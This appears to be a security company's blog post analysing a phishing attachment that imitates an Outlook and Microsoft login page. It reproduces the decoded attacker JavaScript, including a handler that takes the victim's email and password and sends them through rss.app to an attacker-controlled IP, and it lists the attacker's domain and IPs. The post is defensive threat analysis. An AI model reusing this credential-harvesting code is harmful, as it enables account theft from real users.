Kirk ISS Cybersecurity Post

Overview

Earlier this week, we uncovered a somewhat complex phishing campaign that passed VirusTotal and Microsoft’s Automated Investigation and Response (AIR) as non-malicious. While the email itself was fairly innocuous (other than looking exactly like a phishing email and suspicious domain), the attachment it contained was what drew us in. Malicious attachments aren’t anything new, but this one contained thousands of lines of CSS and formatting to emulate an Outlook web login perfectly. In addition, it also had a massive block of Base64-encoded JavaScript that emulated a Microsoft Login.

The result? A convincing phishing email designed to trick users into believing it is a legitimate page.

 

 

Deep Dive

The initial email utilises emails found by scraping a website. In one case, an “info@domain” account was both sender and recipient, adding to some level of legitimacy. In another, the “info@domain” was sent to a user whose email was also scraped online.

 

 

The email stated the user had received a meeting notification, attached as an HTML document. Once downloaded, the attachment served two functions:

  1. Create a convincing Outlook web login attempt, and
  2. Trigger embedded Base64 JavaScript to replicate a Microsoft login and steal credentials.

 

 

The attachment took extreme caution in making the webpage appear as authentic as possible; the first several hundred lines contained CSS and animations used by Microsoft. Once opened, an alert stating “Network Connection Error” appears, regardless of connectivity – this portion is hard-coded when a using a browser other than Edge.

 

 

To get a better understanding of the attachment, we dove into the source code and decoded all Base64 components. Here’s what happens under the hood when the user clicks the “retry” button:

function start(){
         document.getElementById("mArea").style.opacity = 0;
         setTimeout(()=>{
             if(!isEdge() ){

         var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
                 window.location.href =  toText(Base64.decode(nextHmtl))+ap;
             }
             else{
                 document.write((Base64.decode(nextHmtl)));
             }
         },2500);
     }

 

The nextHtml variable is where the malicious JavaScript starts take affect. Close to 6000 lines in length, only the last hundred or so are used for actually capturing credentials. The rest are spent pulling appropriate resources from Microsoft’s servers to give the appearance of a legitimate login attempt, pre-populated with the email recipient to provide additional “validity”.

 

 

Further investigation revealed users were forced to enter their password multiple times after an “invalid password” prompt. This acted as a verification mechanism that the given credential set was legitimate. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification system for the attacker. In the last step, all information entered by the victim is sent to an RSS feed in AWS, indicative of a “sit back and wait” phishing attack.

Here’s a look into what is harvested from the victim and sent back to the attacker:


    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {n    titlen    descriptionn    feedUrln    siteUrln    siteNamen    imageUrln    generatorn    items {n      titlen      urln      descriptionn      daten      enclosure {n        urln        __typenamen      }n      __typenamen    }n    __typenamen  }n}n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);
                    }

                } else{
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });

 

This email was unique in the effort to emulate code used by Microsoft to come up with a similar login. By using the embedded and encoded script, it can run in the same browser or tab to seem as innocuous as possible. While it may seem odd that this much effort was put into creating an attachment and not into the actual delivery of the email, it lends to the belief this was most likely purchased for use in private campaigns.

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125